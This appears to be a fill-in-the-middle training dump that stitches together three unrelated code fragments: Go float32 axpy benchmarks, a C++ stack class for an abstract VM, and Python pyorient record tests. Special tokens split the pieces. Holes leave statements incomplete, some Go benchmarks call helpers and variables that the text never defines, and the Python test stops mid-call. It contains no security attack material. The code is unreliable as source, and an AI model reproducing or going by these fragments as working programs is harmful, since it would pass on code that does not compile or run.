naiveaxpyut(d []float32, a float32, x, y []float32) { for i, v := range x { d[i] = y[i] + a*v } } func BenchmarkF32AxpyUnitaryTo1(t *testing.B) { benchaxpyut(t, 1, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo2(t *testing.B) { benchaxpyut(t, 2, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo3(t *testing.B) { benchaxpyut(t, 3, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo4(t *testing.B) { benchaxpyut(t, 4, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo5(t *testing.B) { benchaxpyut(t, 5, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo10(t *testing.B) { benchaxpyut(t, 10, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo100(t *testing.B) { benchaxpyut(t, 100, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo1000(t *testing.B) { benchaxpyut(t, 1000, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo5000(t *testing.B) { benchaxpyut(t, 5000, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo10000(t *testing.B) { benchaxpyut(t, 
10000, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo50000(t *testing.B) { benchaxpyut(t, 50000, AxpyUnitaryTo) } func BenchmarkLF32AxpyUnitaryTo1(t *testing.B) { benchaxpyut(t, 1, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo2(t *testing.B) { benchaxpyut(t, 2, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo3(t *testing.B) { benchaxpyut(t, 3, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo4(t *testing.B) { benchaxpyut(t, 4, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo5(t *testing.B) { benchaxpyut(t, 5, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo10(t *testing.B) { benchaxpyut(t, 10, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo100(t *testing.B) { benchaxpyut(t, 100, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo1000(t *testing.B) { benchaxpyut(t, 1000, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo5000(t *testing.B) { benchaxpyut(t, 5000, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo10000(t *testing.B) { benchaxpyut(t, 10000, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo50000(t *testing.B) { benchaxpyut(t, 50000, naiveaxpyut) } func benchaxpyinc(t *testing.B, ln, t_inc int, f func(alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr)) { n, inc := uintptr(ln), uintptr(t_inc) var idx int if t_inc < 0 { idx = (-ln + 1) * t_inc<|fim▁hole|> } for i := 0; i < t.N; i++ { f(1, x, y, n, inc, inc, uintptr(idx), uintptr(idx)) } } func naiveaxpyinc(alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr) { for i := 0; i < int(n); i++ { y[iy] += alpha * x[ix] ix += incX iy += incY } } func BenchmarkF32AxpyIncN1Inc1(b *testing.B) { benchaxpyinc(b, 1, 1, AxpyInc) } func BenchmarkF32AxpyIncN2Inc1(b *testing.B) { benchaxpyinc(b, 2, 1, AxpyInc) } func BenchmarkF32AxpyIncN2Inc2(b *testing.B) { benchaxpyinc(b, 2, 2, AxpyInc) } func BenchmarkF32AxpyIncN2Inc4(b *testing.B) { benchaxpyinc(b, 2, 4, AxpyInc) } func BenchmarkF32AxpyIncN2Inc10(b *testing.B) { benchaxpyinc(b, 2, 10, AxpyInc) } func BenchmarkF32AxpyIncN3Inc1(b *testing.B) { benchaxpyinc(b, 3, 1, AxpyInc) } func BenchmarkF32AxpyIncN3Inc2(b *testing.B) { benchaxpyinc(b, 3, 2, AxpyInc) } func BenchmarkF32AxpyIncN3Inc4(b *testing.B) { benchaxpyinc(b, 3, 4, AxpyInc) } func BenchmarkF32AxpyIncN3Inc10(b *testing.B) { benchaxpyinc(b, 3, 10, AxpyInc) } func BenchmarkF32AxpyIncN4Inc1(b *testing.B) { benchaxpyinc(b, 4, 1, AxpyInc) } func BenchmarkF32AxpyIncN4Inc2(b *testing.B) { benchaxpyinc(b, 4, 2, AxpyInc) } func BenchmarkF32AxpyIncN4Inc4(b *testing.B) { benchaxpyinc(b, 4, 4, AxpyInc) } func BenchmarkF32AxpyIncN4Inc10(b *testing.B) { benchaxpyinc(b, 4, 10, AxpyInc) } func BenchmarkF32AxpyIncN10Inc1(b *testing.B) { benchaxpyinc(b, 10, 1, AxpyInc) } func BenchmarkF32AxpyIncN10Inc2(b *testing.B) { benchaxpyinc(b, 10, 2, AxpyInc) } func BenchmarkF32AxpyIncN10Inc4(b *testing.B) { benchaxpyinc(b, 10, 4, AxpyInc) } func BenchmarkF32AxpyIncN10Inc10(b *testing.B) { benchaxpyinc(b, 10, 10, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc1(b *testing.B) { benchaxpyinc(b, 1000, 1, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc2(b *testing.B) { benchaxpyinc(b, 1000, 2, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc4(b *testing.B) { benchaxpyinc(b, 1000, 4, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc10(b *testing.B) { benchaxpyinc(b, 1000, 10, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc1(b *testing.B) { benchaxpyinc(b, 100000, 1, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc2(b *testing.B) { benchaxpyinc(b, 100000, 2, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc4(b *testing.B) { benchaxpyinc(b, 100000, 4, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc10(b 
*testing.B) { benchaxpyinc(b, 100000, 10, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM1(b *testing.B) { benchaxpyinc(b, 100000, -1, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM2(b *testing.B) { benchaxpyinc(b, 100000, -2, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM4(b *testing.B) { benchaxpyinc(b, 100000, -4, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM10(b *testing.B) { benchaxpyinc(b, 100000, -10, AxpyInc) } func BenchmarkLF32AxpyIncN1Inc1(b *testing.B) { benchaxpyinc(b, 1, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc1(b *testing.B) { benchaxpyinc(b, 2, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc2(b *testing.B) { benchaxpyinc(b, 2, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc4(b *testing.B) { benchaxpyinc(b, 2, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc10(b *testing.B) { benchaxpyinc(b, 2, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc1(b *testing.B) { benchaxpyinc(b, 3, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc2(b *testing.B) { benchaxpyinc(b, 3, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc4(b *testing.B) { benchaxpyinc(b, 3, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc10(b *testing.B) { benchaxpyinc(b, 3, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc1(b *testing.B) { benchaxpyinc(b, 4, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc2(b *testing.B) { benchaxpyinc(b, 4, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc4(b *testing.B) { benchaxpyinc(b, 4, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc10(b *testing.B) { benchaxpyinc(b, 4, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc1(b *testing.B) { benchaxpyinc(b, 10, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc2(b *testing.B) { benchaxpyinc(b, 10, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc4(b *testing.B) { benchaxpyinc(b, 10, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc10(b *testing.B) { benchaxpyinc(b, 10, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc1(b *testing.B) { benchaxpyinc(b, 1000, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc2(b *testing.B) { benchaxpyinc(b, 1000, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc4(b *testing.B) { benchaxpyinc(b, 1000, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc10(b *testing.B) { benchaxpyinc(b, 1000, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc1(b *testing.B) { benchaxpyinc(b, 100000, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc2(b *testing.B) { benchaxpyinc(b, 100000, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc4(b *testing.B) { benchaxpyinc(b, 100000, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc10(b *testing.B) { benchaxpyinc(b, 100000, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM1(b *testing.B) { benchaxpyinc(b, 100000, -1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM2(b *testing.B) { benchaxpyinc(b, 100000, -2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM4(b *testing.B) { benchaxpyinc(b, 100000, -4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM10(b *testing.B) { benchaxpyinc(b, 100000, -10, naiveaxpyinc) } func benchaxpyincto(t *testing.B, ln, t_inc int, f func(dst []float32, incDst, idst uintptr, alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr)) { n, inc := uintptr(ln), uintptr(t_inc) var idx int if t_inc < 0 { idx = (-ln + 1) * t_inc } for i := 0; i < t.N; i++ { f(z, inc, uintptr(idx), 1, x, y, n, inc, inc, uintptr(idx), uintptr(idx)) } } func naiveaxpyincto(dst []float32, incDst, idst uintptr, alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr) { for i := 0; i < int(n); i++ 
{ dst[idst] = alpha*x[ix] + y[iy] ix += incX iy += incY idst += incDst } } func BenchmarkF32AxpyIncToN1Inc1(b *testing.B) { benchaxpyincto(b, 1, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc1(b *testing.B) { benchaxpyincto(b, 2, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc2(b *testing.B) { benchaxpyincto(b, 2, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc4(b *testing.B) { benchaxpyincto(b, 2, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc10(b *testing.B) { benchaxpyincto(b, 2, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc1(b *testing.B) { benchaxpyincto(b, 3, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc2(b *testing.B) { benchaxpyincto(b, 3, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc4(b *testing.B) { benchaxpyincto(b, 3, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc10(b *testing.B) { benchaxpyincto(b, 3, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc1(b *testing.B) { benchaxpyincto(b, 4, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc2(b *testing.B) { benchaxpyincto(b, 4, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc4(b *testing.B) { benchaxpyincto(b, 4, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc10(b *testing.B) { benchaxpyincto(b, 4, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc1(b *testing.B) { benchaxpyincto(b, 10, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc2(b *testing.B) { benchaxpyincto(b, 10, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc4(b *testing.B) { benchaxpyincto(b, 10, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc10(b *testing.B) { benchaxpyincto(b, 10, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc1(b *testing.B) { benchaxpyincto(b, 1000, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc2(b *testing.B) { benchaxpyincto(b, 1000, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc4(b *testing.B) { benchaxpyincto(b, 1000, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc10(b *testing.B) { benchaxpyincto(b, 1000, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc1(b *testing.B) { benchaxpyincto(b, 100000, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc2(b *testing.B) { benchaxpyincto(b, 100000, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc4(b *testing.B) { benchaxpyincto(b, 100000, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc10(b *testing.B) { benchaxpyincto(b, 100000, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM1(b *testing.B) { benchaxpyincto(b, 100000, -1, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM2(b *testing.B) { benchaxpyincto(b, 100000, -2, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM4(b *testing.B) { benchaxpyincto(b, 100000, -4, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM10(b *testing.B) { benchaxpyincto(b, 100000, -10, AxpyIncTo) } func BenchmarkLF32AxpyIncToN1Inc1(b *testing.B) { benchaxpyincto(b, 1, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc1(b *testing.B) { benchaxpyincto(b, 2, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc2(b *testing.B) { benchaxpyincto(b, 2, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc4(b *testing.B) { benchaxpyincto(b, 2, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc10(b *testing.B) { benchaxpyincto(b, 2, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc1(b *testing.B) { benchaxpyincto(b, 3, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc2(b *testing.B) { benchaxpyincto(b, 3, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc4(b *testing.B) { benchaxpyincto(b, 3, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc10(b *testing.B) { benchaxpyincto(b, 3, 10, naiveaxpyincto) } func 
BenchmarkLF32AxpyIncToN4Inc1(b *testing.B) { benchaxpyincto(b, 4, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc2(b *testing.B) { benchaxpyincto(b, 4, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc4(b *testing.B) { benchaxpyincto(b, 4, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc10(b *testing.B) { benchaxpyincto(b, 4, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc1(b *testing.B) { benchaxpyincto(b, 10, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc2(b *testing.B) { benchaxpyincto(b, 10, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc4(b *testing.B) { benchaxpyincto(b, 10, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc10(b *testing.B) { benchaxpyincto(b, 10, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc1(b *testing.B) { benchaxpyincto(b, 1000, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc2(b *testing.B) { benchaxpyincto(b, 1000, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc4(b *testing.B) { benchaxpyincto(b, 1000, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc10(b *testing.B) { benchaxpyincto(b, 1000, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc1(b *testing.B) { benchaxpyincto(b, 100000, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc2(b *testing.B) { benchaxpyincto(b, 100000, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc4(b *testing.B) { benchaxpyincto(b, 100000, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc10(b *testing.B) { benchaxpyincto(b, 100000, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM1(b *testing.B) { benchaxpyincto(b, 100000, -1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM2(b *testing.B) { benchaxpyincto(b, 100000, -2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM4(b *testing.B) { benchaxpyincto(b, 100000, -4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM10(b *testing.B) { benchaxpyincto(b, 100000, -10, naiveaxpyincto) }<|fim▁end|>
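// Illustrative only: further size variants would follow the same pattern as
// the benchmarks above, pairing the optimized kernel with its naive reference
// through the existing helpers. The length 500 is an arbitrary example;
// benchaxpyu, AxpyUnitary and naiveaxpyu are the helpers and kernels already
// defined in this file.
func BenchmarkF32AxpyUnitary500(t *testing.B)  { benchaxpyu(t, 500, AxpyUnitary) }
func BenchmarkLF32AxpyUnitary500(t *testing.B) { benchaxpyu(t, 500, naiveaxpyu) }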
<|file_name|>Stack.cpp<|end_file_name|><|fim▁begin|>/* ** Stack.cpp for cpp_abstractvm in /var/projects/cpp_abstractvm/Stack.cpp ** ** Made by kevin labbe ** Login <[email protected]> ** ** Started on Mar 1, 2014 2:15:13 AM 2014 kevin labbe ** Last update Mar 1, 2014 2:15:13 AM 2014 kevin labbe */ #include "EmptyStackException.hpp" #include "AssertFailedException.hpp" #include "WrongParameterException.hpp" #include "Stack.hpp" namespace Arithmetic { Stack::Stack() { _funcs["add"] = &Stack::add; _funcs["sub"] = &Stack::sub; _funcs["mul"] = &Stack::mul; _funcs["div"] = &Stack::div; _funcs["mod"] = &Stack::mod; _funcs["pop"] = &Stack::pop; _funcs["dump"] = &Stack::dump; _funcs["print"] = &Stack::print; } Stack::~Stack() { } void Stack::execFunc(const std::string& name) { if (_funcs[name.c_str()]) (this->*_funcs[name.c_str()])(); } void Stack::push(IOperand* op) { _stack.push_front(op); } void Stack::pop() { if (_stack.empty()) throw Exception::EmptyStackException("pop"); delete _stack.front(); _stack.pop_front(); } void Stack::assert(IOperand* op) { if (_stack.empty()) throw Exception::AssertFailedException("Stack empty"); if (_stack.front()->getPrecision() != op->getPrecision() || _stack.front()->getType() != op->getType() || _stack.front()->toString() != op->toString()) throw Exception::AssertFailedException("Operand different at the top of the stack"); } void Stack::dump() { for (std::deque<IOperand*>::iterator it = _stack.begin(); it != _stack.end(); it++) std::cout << (*it)->toString() << std::endl; } void Stack::print() { std::stringstream stream; char chr; int nbr; if (_stack.empty()) throw Exception::EmptyStackException("print"); if (_stack.front()->getType() != INT8) throw Exception::WrongParameterException("print expects an int8 at the top of the stack"); stream << _stack.front()->toString(); stream >> nbr; chr = nbr; std::cout << chr << std::endl; } void Stack::add() { _loadOperands(); _pushResult(*_op1 + *_op2); } void Stack::sub() { _loadOperands(); _pushResult(*_op1 - *_op2); } void Stack::mul() { _loadOperands(); _pushResult(*_op1 * *_op2); } void Stack::div() { _loadOperands(); _pushResult(*_op1 / *_op2); } void Stack::mod() { _loadOperands(); _pushResult(*_op1 % *_op2); } void Stack::_loadOperands() {<|fim▁hole|> throw Exception::EmptyStackException("Calc"); _op1 = _stack.front(); _stack.pop_front(); _op2 = _stack.front(); _stack.pop_front(); } void Stack::_pushResult(IOperand* result) { _stack.push_front(result); delete _op1; delete _op2; } } /* namespace Arithmetic */<|fim▁end|>
if (_stack.size() < 2)
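// A self-contained sketch (separate from Stack.cpp above) of the
// member-function-pointer dispatch that Stack uses in execFunc: a map from
// command names to member functions, invoked via (this->*ptr)(). The class
// and method names here are made up for illustration.
#include <iostream>
#include <map>
#include <string>

class Dispatcher {
public:
    Dispatcher() {
        _funcs["greet"] = &Dispatcher::greet;
    }
    void execFunc(const std::string& name) {
        // operator[] value-initializes missing entries to a null pointer,
        // so unknown commands are silently ignored, as in Stack::execFunc.
        if (_funcs[name])
            (this->*_funcs[name])();
    }
private:
    void greet() { std::cout << "hello" << std::endl; }
    std::map<std::string, void (Dispatcher::*)()> _funcs;
};

int main() {
    Dispatcher d;
    d.execFunc("greet");   // prints "hello"
    d.execFunc("unknown"); // no-op
    return 0;
}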
<|file_name|>test_record_contents.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- __author__ = 'Ostico <[email protected]>' import unittest import os os.environ['DEBUG'] = "1" os.environ['DEBUG_VERBOSE'] = "0" import pyorient class CommandTestCase(unittest.TestCase): def __init__(self, *args, **kwargs): super(CommandTestCase, self).__init__(*args, **kwargs) self.client = None self.cluster_info = None self.class_id1 = None def setUp(self): self.client = pyorient.OrientDB("localhost", 2424) self.client.connect("root", "root") db_name = "test_tr" try: self.client.db_drop(db_name) except pyorient.PyOrientStorageException as e: print(e) finally: db = self.client.db_create(db_name, pyorient.DB_TYPE_GRAPH, pyorient.STORAGE_TYPE_MEMORY) pass self.cluster_info = self.client.db_open( db_name, "root", "root", pyorient.DB_TYPE_GRAPH, "" ) self.class_id1 = \ self.client.command("create class my_v_class extends V")[0] def test_boolean(self): rec = self.client.command('create vertex v content {"abcdef":false,' '"qwerty":TRUE}') assert rec[0].abcdef is not True, "abcdef expected False: '%s'" % rec[ 0].abcdef assert rec[0].qwerty is True, "qwerty expected True: '%s'" % rec[ 0].qwerty rec_value = self.client.query('select from v') assert rec_value[0].abcdef is not True, "abcdef expected False: '%s'" % \ rec_value[0].abcdef assert rec_value[0].qwerty is True, "qwerty expected True: '%s'" % \ rec_value[0].qwerty def test_record_create_nonstrings(self): # this should succeed with no exception self.client.record_create(self.class_id1, {'@my_v_class': {'a': 1.5, 'b': 'foo'}}) def test_record_create_embedded_list(self): # this should succeed with no exception self.client.record_create(self.class_id1, {'@my_v_class': {'a': ['bar', 'bar']}}) def test_record_create_embedded_dictionary(self): # this should succeed with no exception self.client.record_create(self.class_id1, {'@my_v_class': {'a': [{'bar': 'bar'}]}}) def test_new_orient_dict(self): rec = self.client.command('create vertex v content {"a":false,' '"q":TRUE}') assert rec[0].a is False assert rec[0].q is True import re # this can differ from orientDB versions, so i use a regular expression assert re.match('[0-1]', str(rec[0]._version)) assert rec[0]._rid == '#10:0' rec = {'a': 1, 'b': 2, 'c': 3} rec_position = self.client.record_create(3, rec) assert rec_position.a == 1 assert rec_position.b == 2 assert rec_position.c == 3 # this can differ from orientDB versions, so i use a regular expression assert re.match('[0-1]', str(rec_position._version)) assert rec_position._rid == '#3:0' res = self.client.query("select from " + rec_position._rid) assert res[0].a == 1 assert res[0].b == 2 assert res[0].c == 3 # this can differ from orientDB versions, so i use a regular expression assert re.match('[0-1]', str(res[0]._version)) assert res[0]._rid == '#3:0' print(res[0].oRecordData['a']) def test_embedded_map(self): res = self.client.command( 'create vertex v content {"a":1,"b":{"d":"e"},"c":3}' ) # print(res[0]) res = self.client.command( 'create vertex v content {"a":1,"b":{},"c":3}' ) # print(res[0]) # print(res[0].oRecordData['b']) assert res[0].oRecordData['b'] == {}, "Failed to asert that received " + \ res[0].oRecordData['b'] + " equals '{}" res = self.client.command('create vertex v content {"a":1,"b":{}}') # print(res[0]) assert res[0].oRecordData['b'] == {}, "Failed to asert that received " \ "" + res[0].oRecordData['b'] + \ " equals '{}" res = self.client.command( 'create vertex v content {"b":{},"a":1,"d":{}}' ) # print(res[0]) assert 
res[0].oRecordData['b'] == {}, "Failed to asert that received " \ "" + res[0].oRecordData['b'] + \ " equals '{}" assert res[0].oRecordData['d'] == {}, "Failed to asert that received " \ "" + res[0].oRecordData['d'] + \ " equals '{}" def test_nested_objects_1(self): res = self.client.command( 'create vertex v content {"b":[[1]],"a":{},"d":[12],"c":["x"]}' ) print(res[0]) def test_nested_objects_2(self): res = self.client.command( 'create vertex v content {"b":[[1,"abc"]]}' ) print(res[0]) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1] == "abc" def test_nested_objects_3(self): res = self.client.command( 'create vertex v content {"b":[[1,{"abc":2}]]}' ) print(res[0]) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1]['abc'] == 2 def test_nested_objects_4(self): res = self.client.command( 'create vertex v content {"b":[[1,{"abc":2}],[3,{"cde":4}]]}' ) print(res[0]) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1]['abc'] == 2 assert res[0].oRecordData['b'][1][0] == 3 assert res[0].oRecordData['b'][1][1]['cde'] == 4 def test_nested_objects_5(self): res = self.client.command( 'create vertex v content ' '{"b":[[1,{"dx":[1,2]},"abc"]],"a":{},"d":[12],"c":["x"],"s":111}' ) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1]['dx'][0] == 1 assert res[0].oRecordData['b'][0][1]['dx'][1] == 2 assert res[0].oRecordData['b'][0][2] == "abc" assert res[0].oRecordData['a'] == {} assert res[0].oRecordData['d'][0] == 12 assert res[0].oRecordData['c'][0] == "x" assert res[0].oRecordData['s'] == 111 print(res[0]) def test_nested_objects_6(self): res = self.client.command( 'create vertex v content ' '{"b":[[1,2,"abc"]]}' ) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1] == 2 assert res[0].oRecordData['b'][0][2] == "abc" print(res[0]) def test_nested_objects_7(self): res = self.client.command( 'create vertex v content ' '{"b":[{"xx":{"xxx":[1,2,"abc"]}}]}' ) assert isinstance(res[0].oRecordData['b'], list) assert isinstance(res[0].oRecordData['b'][0], dict) assert isinstance(res[0].oRecordData['b'][0]['xx'], dict) assert isinstance(res[0].oRecordData['b'][0]['xx']['xxx'], list) assert res[0].oRecordData['b'][0]['xx']['xxx'][0] == 1 assert res[0].oRecordData['b'][0]['xx']['xxx'][1] == 2 assert res[0].oRecordData['b'][0]['xx']['xxx'][2] == "abc" print(res[0]) def test_nested_objects_8(self): res = self.client.command( 'create vertex v content ' '{"b":[{"xx":{"xxx":[1,2,"abc"]}}],"c":[{"yy":{"yyy":[3,4,"cde"]}}]}' ) assert isinstance(res[0].oRecordData['b'], list) assert isinstance(res[0].oRecordData['b'][0], dict) assert isinstance(res[0].oRecordData['b'][0]['xx'], dict) assert isinstance(res[0].oRecordData['b'][0]['xx']['xxx'], list) assert res[0].oRecordData['b'][0]['xx']['xxx'][0] == 1 assert res[0].oRecordData['b'][0]['xx']['xxx'][1] == 2 assert res[0].oRecordData['b'][0]['xx']['xxx'][2] == "abc" assert isinstance(res[0].oRecordData['c'], list) assert isinstance(res[0].oRecordData['c'][0], dict) assert isinstance(res[0].oRecordData['c'][0]['yy'], dict) assert isinstance(res[0].oRecordData['c'][0]['yy']['yyy'], list) assert res[0].oRecordData['c'][0]['yy']['yyy'][0] == 3 assert res[0].oRecordData['c'][0]['yy']['yyy'][1] == 4 assert res[0].oRecordData['c'][0]['yy']['yyy'][2] == "cde" print(res[0]) <|fim▁hole|> '{"a":[[1,2],[3,4],[5,6],null]}' ) assert isinstance(res[0].oRecordData['a'], list) assert isinstance(res[0].oRecordData['a'][0], list) assert 
isinstance(res[0].oRecordData['a'][1], list) assert isinstance(res[0].oRecordData['a'][2], list) assert res[0].oRecordData['a'][0][0] == 1 assert res[0].oRecordData['a'][0][1] == 2 print(res[0]) def test_nested_objects_10(self): res = self.client.command( 'create vertex v content ' '{"embedded_map":{"one":[1,2]}}' ) assert isinstance(res[0].oRecordData['embedded_map'], dict) assert isinstance(res[0].oRecordData['embedded_map']['one'], list) assert res[0].oRecordData['embedded_map']['one'][0] == 1 assert res[0].oRecordData['embedded_map']['one'][1] == 2 print(res[0]) def test_nested_objects_11(self): res = self.client.command( 'create vertex v content ' '{"embedded_map":{"one":{"three":4}}}' ) assert isinstance(res[0].oRecordData['embedded_map'], dict) assert isinstance(res[0].oRecordData['embedded_map']['one'], dict) assert res[0].oRecordData['embedded_map']['one']["three"] == 4 print(res[0]) def test_nested_objects_12(self): res = self.client.command( 'create vertex v content ' '{"embedded_map":{"one":2}}' ) assert isinstance(res[0].oRecordData['embedded_map'], dict) assert res[0].oRecordData['embedded_map']['one'] == 2 print(res[0]) def test_nested_objects_13(self): res = self.client.command( 'create vertex v content ' '{"a":1,"b":{},"c":3}' ) assert res[0].oRecordData['a'] == 1 assert isinstance(res[0].oRecordData['b'], dict) assert len(res[0].oRecordData['b']) == 0 assert res[0].oRecordData['c'] == 3 print(res[0]) def test_quotes(self): import json test_data = {'scenario': 'a "quote" follows'} record = self.client.command("CREATE VERTEX V CONTENT " + json.dumps(test_data))[0] assert record._rid == '#10:0' assert record.oRecordData['scenario'] == 'a "quote" follows' def test_db_list(self): self.client.connect("root", "root") databases = self.client.db_list() assert databases.oRecordData['databases']['GratefulDeadConcerts'] def test_datetime(self): x = self.client.query( "SELECT DATE('2015-01-02 03:04:05')" ) x = x[0].oRecordData import datetime assert 'DATE' in x assert isinstance(x['DATE'], datetime.datetime) assert str(x['DATE']) == '2015-01-02 03:04:05' def test_deserialize_numeric_types(self): lon1 = self.client.command( "CREATE VERTEX V CONTENT {'longitude': 1.1}")[0].longitude lon2 = self.client.command( "CREATE VERTEX V CONTENT {'longitude': -1.1}")[0].longitude lon3 = self.client.command( 